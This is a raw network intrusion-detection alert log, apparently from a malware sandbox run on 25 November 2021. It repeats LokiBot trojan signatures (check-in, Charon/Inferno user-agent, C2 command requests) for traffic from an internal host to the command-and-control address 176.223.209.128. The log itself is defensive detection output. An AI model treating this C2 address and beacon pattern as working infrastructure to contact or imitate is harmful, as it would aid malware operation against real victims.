                                              11/25/21-10:54:42.044572TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5062680192.168.11.20176.223.209.128
                                              11/25/21-10:54:42.044572TCP2025381ET TROJAN LokiBot Checkin5062680192.168.11.20176.223.209.128
                                              11/25/21-10:54:42.044572TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25062680192.168.11.20176.223.209.128
                                              11/25/21-10:54:42.547776TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15062780192.168.11.20176.223.209.128
                                              11/25/21-10:54:42.547776TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5062780192.168.11.20176.223.209.128
                                              11/25/21-10:54:42.547776TCP2025381ET TROJAN LokiBot Checkin5062780192.168.11.20176.223.209.128
                                              11/25/21-10:54:42.547776TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25062780192.168.11.20176.223.209.128
                                              11/25/21-10:54:43.023086TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15062880192.168.11.20176.223.209.128
                                              11/25/21-10:54:43.023086TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5062880192.168.11.20176.223.209.128
                                              11/25/21-10:54:43.023086TCP2025381ET TROJAN LokiBot Checkin5062880192.168.11.20176.223.209.128
                                              11/25/21-10:54:43.023086TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25062880192.168.11.20176.223.209.128
                                              11/25/21-10:54:43.528950TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15062980192.168.11.20176.223.209.128
                                              11/25/21-10:54:43.528950TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5062980192.168.11.20176.223.209.128
                                              11/25/21-10:54:43.528950TCP2025381ET TROJAN LokiBot Checkin5062980192.168.11.20176.223.209.128
                                              11/25/21-10:54:43.528950TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25062980192.168.11.20176.223.209.128
                                              11/25/21-10:54:43.982401TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15063080192.168.11.20176.223.209.128
                                              11/25/21-10:54:43.982401TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5063080192.168.11.20176.223.209.128
                                              11/25/21-10:54:43.982401TCP2025381ET TROJAN LokiBot Checkin5063080192.168.11.20176.223.209.128
                                              11/25/21-10:54:43.982401TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25063080192.168.11.20176.223.209.128
                                              11/25/21-10:54:44.482333TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15063180192.168.11.20176.223.209.128
                                              11/25/21-10:54:44.482333TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5063180192.168.11.20176.223.209.128
                                              11/25/21-10:54:44.482333TCP2025381ET TROJAN LokiBot Checkin5063180192.168.11.20176.223.209.128
                                              11/25/21-10:54:44.482333TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25063180192.168.11.20176.223.209.128
                                              11/25/21-10:54:44.983291TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15063280192.168.11.20176.223.209.128
                                              11/25/21-10:54:44.983291TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5063280192.168.11.20176.223.209.128
                                              11/25/21-10:54:44.983291TCP2025381ET TROJAN LokiBot Checkin5063280192.168.11.20176.223.209.128
                                              11/25/21-10:54:44.983291TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25063280192.168.11.20176.223.209.128
                                              11/25/21-10:54:45.439633TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15063380192.168.11.20176.223.209.128
                                              11/25/21-10:54:45.439633TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5063380192.168.11.20176.223.209.128
                                              11/25/21-10:54:45.439633TCP2025381ET TROJAN LokiBot Checkin5063380192.168.11.20176.223.209.128
                                              11/25/21-10:54:45.439633TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25063380192.168.11.20176.223.209.128
                                              11/25/21-10:54:45.952049TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15063480192.168.11.20176.223.209.128
                                              11/25/21-10:54:45.952049TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5063480192.168.11.20176.223.209.128
                                              11/25/21-10:54:45.952049TCP2025381ET TROJAN LokiBot Checkin5063480192.168.11.20176.223.209.128
                                              11/25/21-10:54:45.952049TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25063480192.168.11.20176.223.209.128
                                              11/25/21-10:54:46.455302TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15063580192.168.11.20176.223.209.128
                                              11/25/21-10:54:46.455302TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5063580192.168.11.20176.223.209.128
                                              11/25/21-10:54:46.455302TCP2025381ET TROJAN LokiBot Checkin5063580192.168.11.20176.223.209.128
                                              11/25/21-10:54:46.455302TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25063580192.168.11.20176.223.209.128
                                              11/25/21-10:54:46.977531TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15063680192.168.11.20176.223.209.128
                                              11/25/21-10:54:46.977531TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5063680192.168.11.20176.223.209.128
                                              11/25/21-10:54:46.977531TCP2025381ET TROJAN LokiBot Checkin5063680192.168.11.20176.223.209.128
                                              11/25/21-10:54:46.977531TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25063680192.168.11.20176.223.209.128
                                              11/25/21-10:54:47.479979TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15063780192.168.11.20176.223.209.128
                                              11/25/21-10:54:47.479979TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5063780192.168.11.20176.223.209.128
                                              11/25/21-10:54:47.479979TCP2025381ET TROJAN LokiBot Checkin5063780192.168.11.20176.223.209.128
                                              11/25/21-10:54:47.479979TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25063780192.168.11.20176.223.209.128
                                              11/25/21-10:54:47.949235TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15063880192.168.11.20176.223.209.128
                                              11/25/21-10:54:47.949235TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5063880192.168.11.20176.223.209.128
                                              11/25/21-10:54:47.949235TCP2025381ET TROJAN LokiBot Checkin5063880192.168.11.20176.223.209.128
                                              11/25/21-10:54:47.949235TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25063880192.168.11.20176.223.209.128
                                              11/25/21-10:54:48.460000TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15063980192.168.11.20176.223.209.128
                                              11/25/21-10:54:48.460000TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5063980192.168.11.20176.223.209.128
                                              11/25/21-10:54:48.460000TCP2025381ET TROJAN LokiBot Checkin5063980192.168.11.20176.223.209.128
                                              11/25/21-10:54:48.460000TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25063980192.168.11.20176.223.209.128
                                              11/25/21-10:54:48.980264TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15064080192.168.11.20176.223.209.128
                                              11/25/21-10:54:48.980264TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5064080192.168.11.20176.223.209.128
                                              11/25/21-10:54:48.980264TCP2025381ET TROJAN LokiBot Checkin5064080192.168.11.20176.223.209.128
                                              11/25/21-10:54:48.980264TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25064080192.168.11.20176.223.209.128
                                              11/25/21-10:54:49.491342TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15064180192.168.11.20176.223.209.128
                                              11/25/21-10:54:49.491342TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5064180192.168.11.20176.223.209.128
                                              11/25/21-10:54:49.491342TCP2025381ET TROJAN LokiBot Checkin5064180192.168.11.20176.223.209.128
                                              11/25/21-10:54:49.491342TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25064180192.168.11.20176.223.209.128
                                              11/25/21-10:54:50.009142TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15064280192.168.11.20176.223.209.128
                                              11/25/21-10:54:50.009142TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5064280192.168.11.20176.223.209.128
                                              11/25/21-10:54:50.009142TCP2025381ET TROJAN LokiBot Checkin5064280192.168.11.20176.223.209.128
                                              11/25/21-10:54:50.009142TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25064280192.168.11.20176.223.209.128
                                              11/25/21-10:54:50.524009TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15064380192.168.11.20176.223.209.128
                                              11/25/21-10:54:50.524009TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5064380192.168.11.20176.223.209.128
                                              11/25/21-10:54:50.524009TCP2025381ET TROJAN LokiBot Checkin5064380192.168.11.20176.223.209.128
                                              11/25/21-10:54:50.524009TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25064380192.168.11.20176.223.209.128
                                              11/25/21-10:54:51.017243TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15064480192.168.11.20176.223.209.128
                                              11/25/21-10:54:51.017243TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5064480192.168.11.20176.223.209.128
                                              11/25/21-10:54:51.017243TCP2025381ET TROJAN LokiBot Checkin5064480192.168.11.20176.223.209.128
                                              11/25/21-10:54:51.017243TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25064480192.168.11.20176.223.209.128
                                              11/25/21-10:54:51.521089TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15064580192.168.11.20176.223.209.128
                                              11/25/21-10:54:51.521089TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5064580192.168.11.20176.223.209.128
                                              11/25/21-10:54:51.521089TCP2025381ET TROJAN LokiBot Checkin5064580192.168.11.20176.223.209.128
                                              11/25/21-10:54:51.521089TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25064580192.168.11.20176.223.209.128
                                              11/25/21-10:54:51.987314TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15064680192.168.11.20176.223.209.128
                                              11/25/21-10:54:51.987314TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5064680192.168.11.20176.223.209.128
                                              11/25/21-10:54:51.987314TCP2025381ET TROJAN LokiBot Checkin5064680192.168.11.20176.223.209.128
                                              11/25/21-10:54:51.987314TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25064680192.168.11.20176.223.209.128
                                              11/25/21-10:54:52.546072TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15064780192.168.11.20176.223.209.128
                                              11/25/21-10:54:52.546072TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5064780192.168.11.20176.223.209.128
                                              11/25/21-10:54:52.546072TCP2025381ET TROJAN LokiBot Checkin5064780192.168.11.20176.223.209.128
                                              11/25/21-10:54:52.546072TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25064780192.168.11.20176.223.209.128
                                              11/25/21-10:54:53.019558TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15064880192.168.11.20176.223.209.128
                                              11/25/21-10:54:53.019558TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5064880192.168.11.20176.223.209.128
                                              11/25/21-10:54:53.019558TCP2025381ET TROJAN LokiBot Checkin5064880192.168.11.20176.223.209.128
                                              11/25/21-10:54:53.019558TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25064880192.168.11.20176.223.209.128
                                              11/25/21-10:54:53.534335TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15064980192.168.11.20176.223.209.128
                                              11/25/21-10:54:53.534335TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5064980192.168.11.20176.223.209.128
                                              11/25/21-10:54:53.534335TCP2025381ET TROJAN LokiBot Checkin5064980192.168.11.20176.223.209.128
                                              11/25/21-10:54:53.534335TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25064980192.168.11.20176.223.209.128
                                              11/25/21-10:54:54.011787TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15065080192.168.11.20176.223.209.128
                                              11/25/21-10:54:54.011787TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5065080192.168.11.20176.223.209.128
                                              11/25/21-10:54:54.011787TCP2025381ET TROJAN LokiBot Checkin5065080192.168.11.20176.223.209.128
                                              11/25/21-10:54:54.011787TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25065080192.168.11.20176.223.209.128
                                              11/25/21-10:54:54.518849TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15065180192.168.11.20176.223.209.128
                                              11/25/21-10:54:54.518849TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5065180192.168.11.20176.223.209.128
                                              11/25/21-10:54:54.518849TCP2025381ET TROJAN LokiBot Checkin5065180192.168.11.20176.223.209.128
                                              11/25/21-10:54:54.518849TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25065180192.168.11.20176.223.209.128
                                              11/25/21-10:54:55.034068TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15065280192.168.11.20176.223.209.128
                                              11/25/21-10:54:55.034068TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5065280192.168.11.20176.223.209.128
                                              11/25/21-10:54:55.034068TCP2025381ET TROJAN LokiBot Checkin5065280192.168.11.20176.223.209.128
                                              11/25/21-10:54:55.034068TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25065280192.168.11.20176.223.209.128
                                              11/25/21-10:54:55.547945TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15065380192.168.11.20176.223.209.128
                                              11/25/21-10:54:55.547945TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5065380192.168.11.20176.223.209.128
                                              11/25/21-10:54:55.547945TCP2025381ET TROJAN LokiBot Checkin5065380192.168.11.20176.223.209.128
                                              11/25/21-10:54:55.547945TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25065380192.168.11.20176.223.209.128
                                              11/25/21-10:54:56.056137TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15065480192.168.11.20176.223.209.128
                                              11/25/21-10:54:56.056137TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5065480192.168.11.20176.223.209.128
                                              11/25/21-10:54:56.056137TCP2025381ET TROJAN LokiBot Checkin5065480192.168.11.20176.223.209.128
                                              11/25/21-10:54:56.056137TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25065480192.168.11.20176.223.209.128
                                              11/25/21-10:54:56.566470TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15065580192.168.11.20176.223.209.128
                                              11/25/21-10:54:56.566470TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5065580192.168.11.20176.223.209.128
                                              11/25/21-10:54:56.566470TCP2025381ET TROJAN LokiBot Checkin5065580192.168.11.20176.223.209.128
                                              11/25/21-10:54:56.566470TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25065580192.168.11.20176.223.209.128
                                              11/25/21-10:54:57.072320TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15065680192.168.11.20176.223.209.128
                                              11/25/21-10:54:57.072320TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5065680192.168.11.20176.223.209.128
                                              11/25/21-10:54:57.072320TCP2025381ET TROJAN LokiBot Checkin5065680192.168.11.20176.223.209.128
                                              11/25/21-10:54:57.072320TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25065680192.168.11.20176.223.209.128
                                              11/25/21-10:54:57.565910TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15065780192.168.11.20176.223.209.128
                                              11/25/21-10:54:57.565910TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5065780192.168.11.20176.223.209.128
                                              11/25/21-10:54:57.565910TCP2025381ET TROJAN LokiBot Checkin5065780192.168.11.20176.223.209.128
                                              11/25/21-10:54:57.565910TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25065780192.168.11.20176.223.209.128
                                              11/25/21-10:54:58.031226TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15065880192.168.11.20176.223.209.128
                                              11/25/21-10:54:58.031226TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5065880192.168.11.20176.223.209.128
                                              11/25/21-10:54:58.031226TCP2025381ET TROJAN LokiBot Checkin5065880192.168.11.20176.223.209.128
                                              11/25/21-10:54:58.031226TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25065880192.168.11.20176.223.209.128
                                              11/25/21-10:54:58.463608TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15065980192.168.11.20176.223.209.128
                                              11/25/21-10:54:58.463608TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5065980192.168.11.20176.223.209.128
                                              11/25/21-10:54:58.463608TCP2025381ET TROJAN LokiBot Checkin5065980192.168.11.20176.223.209.128
                                              11/25/21-10:54:58.463608TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25065980192.168.11.20176.223.209.128
                                              11/25/21-10:54:58.966616TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15066080192.168.11.20176.223.209.128
                                              11/25/21-10:54:58.966616TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5066080192.168.11.20176.223.209.128
                                              11/25/21-10:54:58.966616TCP2025381ET TROJAN LokiBot Checkin5066080192.168.11.20176.223.209.128
                                              11/25/21-10:54:58.966616TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25066080192.168.11.20176.223.209.128
                                              11/25/21-10:54:59.471626TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15066180192.168.11.20176.223.209.128
                                              11/25/21-10:54:59.471626TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5066180192.168.11.20176.223.209.128
                                              11/25/21-10:54:59.471626TCP2025381ET TROJAN LokiBot Checkin5066180192.168.11.20176.223.209.128
                                              11/25/21-10:54:59.471626TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25066180192.168.11.20176.223.209.128
                                              11/25/21-10:54:59.978509TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15066280192.168.11.20176.223.209.128
                                              11/25/21-10:54:59.978509TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5066280192.168.11.20176.223.209.128
                                              11/25/21-10:54:59.978509TCP2025381ET TROJAN LokiBot Checkin5066280192.168.11.20176.223.209.128
                                              11/25/21-10:54:59.978509TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25066280192.168.11.20176.223.209.128
                                              11/25/21-10:55:00.435673TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15066380192.168.11.20176.223.209.128
                                              11/25/21-10:55:00.435673TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5066380192.168.11.20176.223.209.128
                                              11/25/21-10:55:00.435673TCP2025381ET TROJAN LokiBot Checkin5066380192.168.11.20176.223.209.128
                                              11/25/21-10:55:00.435673TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25066380192.168.11.20176.223.209.128
                                              11/25/21-10:55:00.937404TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15066480192.168.11.20176.223.209.128
                                              11/25/21-10:55:00.937404TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5066480192.168.11.20176.223.209.128
                                              11/25/21-10:55:00.937404TCP2025381ET TROJAN LokiBot Checkin5066480192.168.11.20176.223.209.128
                                              11/25/21-10:55:00.937404TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25066480192.168.11.20176.223.209.128
                                              11/25/21-10:55:01.418915TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15066580192.168.11.20176.223.209.128
                                              11/25/21-10:55:01.418915TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5066580192.168.11.20176.223.209.128
                                              11/25/21-10:55:01.418915TCP2025381ET TROJAN LokiBot Checkin5066580192.168.11.20176.223.209.128
                                              11/25/21-10:55:01.418915TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25066580192.168.11.20176.223.209.128
                                              11/25/21-10:55:01.928401TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15066680192.168.11.20176.223.209.128
                                              11/25/21-10:55:01.928401TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5066680192.168.11.20176.223.209.128
                                              11/25/21-10:55:01.928401TCP2025381ET TROJAN LokiBot Checkin5066680192.168.11.20176.223.209.128
                                              11/25/21-10:55:01.928401TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25066680192.168.11.20176.223.209.128
                                              11/25/21-10:55:02.442047TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15066780192.168.11.20176.223.209.128
                                              11/25/21-10:55:02.442047TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5066780192.168.11.20176.223.209.128
                                              11/25/21-10:55:02.442047TCP2025381ET TROJAN LokiBot Checkin5066780192.168.11.20176.223.209.128
                                              11/25/21-10:55:02.442047TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25066780192.168.11.20176.223.209.128
                                              11/25/21-10:55:02.979042TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15066880192.168.11.20176.223.209.128
                                              11/25/21-10:55:02.979042TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5066880192.168.11.20176.223.209.128
                                              11/25/21-10:55:02.979042TCP2025381ET TROJAN LokiBot Checkin5066880192.168.11.20176.223.209.128
                                              11/25/21-10:55:02.979042TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25066880192.168.11.20176.223.209.128
                                              11/25/21-10:55:03.513245TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15066980192.168.11.20176.223.209.128
                                              11/25/21-10:55:03.513245TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5066980192.168.11.20176.223.209.128
                                              11/25/21-10:55:03.513245TCP2025381ET TROJAN LokiBot Checkin5066980192.168.11.20176.223.209.128
                                              11/25/21-10:55:03.513245TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25066980192.168.11.20176.223.209.128
                                              11/25/21-10:55:03.981457TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15067080192.168.11.20176.223.209.128
                                              11/25/21-10:55:03.981457TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5067080192.168.11.20176.223.209.128
                                              11/25/21-10:55:03.981457TCP2025381ET TROJAN LokiBot Checkin5067080192.168.11.20176.223.209.128
                                              11/25/21-10:55:03.981457TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25067080192.168.11.20176.223.209.128
                                              11/25/21-10:55:04.538402TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15067180192.168.11.20176.223.209.128
                                              11/25/21-10:55:04.538402TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5067180192.168.11.20176.223.209.128
                                              11/25/21-10:55:04.538402TCP2025381ET TROJAN LokiBot Checkin5067180192.168.11.20176.223.209.128
                                              11/25/21-10:55:04.538402TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25067180192.168.11.20176.223.209.128
                                              11/25/21-10:55:05.052795TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15067280192.168.11.20176.223.209.128
                                              11/25/21-10:55:05.052795TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5067280192.168.11.20176.223.209.128
                                              11/25/21-10:55:05.052795TCP2025381ET TROJAN LokiBot Checkin5067280192.168.11.20176.223.209.128
                                              11/25/21-10:55:05.052795TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25067280192.168.11.20176.223.209.128
                                              11/25/21-10:55:05.569177TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15067380192.168.11.20176.223.209.128
                                              11/25/21-10:55:05.569177TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5067380192.168.11.20176.223.209.128
                                              11/25/21-10:55:05.569177TCP2025381ET TROJAN LokiBot Checkin5067380192.168.11.20176.223.209.128
                                              11/25/21-10:55:05.569177TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25067380192.168.11.20176.223.209.128
                                              11/25/21-10:55:06.082836TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15067480192.168.11.20176.223.209.128
                                              11/25/21-10:55:06.082836TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5067480192.168.11.20176.223.209.128
                                              11/25/21-10:55:06.082836TCP2025381ET TROJAN LokiBot Checkin5067480192.168.11.20176.223.209.128
                                              11/25/21-10:55:06.082836TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25067480192.168.11.20176.223.209.128
                                              11/25/21-10:55:06.598789TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15067580192.168.11.20176.223.209.128
                                              11/25/21-10:55:06.598789TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5067580192.168.11.20176.223.209.128
                                              11/25/21-10:55:06.598789TCP2025381ET TROJAN LokiBot Checkin5067580192.168.11.20176.223.209.128
                                              11/25/21-10:55:06.598789TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25067580192.168.11.20176.223.209.128
                                              11/25/21-10:55:07.053125TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15067680192.168.11.20176.223.209.128
                                              11/25/21-10:55:07.053125TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5067680192.168.11.20176.223.209.128
                                              11/25/21-10:55:07.053125TCP2025381ET TROJAN LokiBot Checkin5067680192.168.11.20176.223.209.128
                                              11/25/21-10:55:07.053125TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25067680192.168.11.20176.223.209.128
                                              11/25/21-10:55:07.557350TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15067780192.168.11.20176.223.209.128
                                              11/25/21-10:55:07.557350TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5067780192.168.11.20176.223.209.128
                                              11/25/21-10:55:07.557350TCP2025381ET TROJAN LokiBot Checkin5067780192.168.11.20176.223.209.128
                                              11/25/21-10:55:07.557350TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25067780192.168.11.20176.223.209.128
                                              11/25/21-10:55:08.069898TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15067880192.168.11.20176.223.209.128
                                              11/25/21-10:55:08.069898TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5067880192.168.11.20176.223.209.128
                                              11/25/21-10:55:08.069898TCP2025381ET TROJAN LokiBot Checkin5067880192.168.11.20176.223.209.128
                                              11/25/21-10:55:08.069898TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25067880192.168.11.20176.223.209.128
                                              11/25/21-10:55:08.535660TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15067980192.168.11.20176.223.209.128
                                              11/25/21-10:55:08.535660TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5067980192.168.11.20176.223.209.128
                                              11/25/21-10:55:08.535660TCP2025381ET TROJAN LokiBot Checkin5067980192.168.11.20176.223.209.128
                                              11/25/21-10:55:08.535660TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25067980192.168.11.20176.223.209.128
                                              11/25/21-10:55:08.993230TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15068080192.168.11.20176.223.209.128
                                              11/25/21-10:55:08.993230TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5068080192.168.11.20176.223.209.128
                                              11/25/21-10:55:08.993230TCP2025381ET TROJAN LokiBot Checkin5068080192.168.11.20176.223.209.128
                                              11/25/21-10:55:08.993230TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25068080192.168.11.20176.223.209.128
                                              11/25/21-10:55:09.501050TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15068180192.168.11.20176.223.209.128
                                              11/25/21-10:55:09.501050TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5068180192.168.11.20176.223.209.128
                                              11/25/21-10:55:09.501050TCP2025381ET TROJAN LokiBot Checkin5068180192.168.11.20176.223.209.128
                                              11/25/21-10:55:09.501050TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25068180192.168.11.20176.223.209.128
                                              11/25/21-10:55:10.027946TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15068280192.168.11.20176.223.209.128
                                              11/25/21-10:55:10.027946TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5068280192.168.11.20176.223.209.128
                                              11/25/21-10:55:10.027946TCP2025381ET TROJAN LokiBot Checkin5068280192.168.11.20176.223.209.128
                                              11/25/21-10:55:10.027946TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25068280192.168.11.20176.223.209.128
                                              11/25/21-10:55:10.499801TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15068380192.168.11.20176.223.209.128
                                              11/25/21-10:55:10.499801TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5068380192.168.11.20176.223.209.128
                                              11/25/21-10:55:10.499801TCP2025381ET TROJAN LokiBot Checkin5068380192.168.11.20176.223.209.128
                                              11/25/21-10:55:10.499801TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25068380192.168.11.20176.223.209.128
                                              11/25/21-10:55:11.026773TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15068480192.168.11.20176.223.209.128
                                              11/25/21-10:55:11.026773TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5068480192.168.11.20176.223.209.128
